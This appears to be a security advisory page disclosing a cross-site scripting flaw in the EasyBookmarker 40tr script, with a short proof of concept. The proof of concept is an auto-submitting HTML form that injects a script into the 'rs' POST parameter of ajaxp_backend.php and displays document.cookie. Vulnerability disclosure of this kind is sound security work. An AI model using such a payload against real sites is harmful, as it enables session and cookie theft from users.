EasyBookmarker 40tr suffers from a cross site scripting vulnerability.
905dcf0aaecd9a880181f25237b2f372c3e145ef9f1202c0e68983b6671a934e----------------------------------------------------------------
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
----------------------------------------------------------------
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
----------------------------------------------------------------
Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
----------------------------------------------------------------
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://example/zomplog/ajaxp_backend.php"
method="POST" name="form">
<input type="hidden" name="rs" value=""  <script>alert(document.cookie)</script>">
</form>
</body>
</html>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed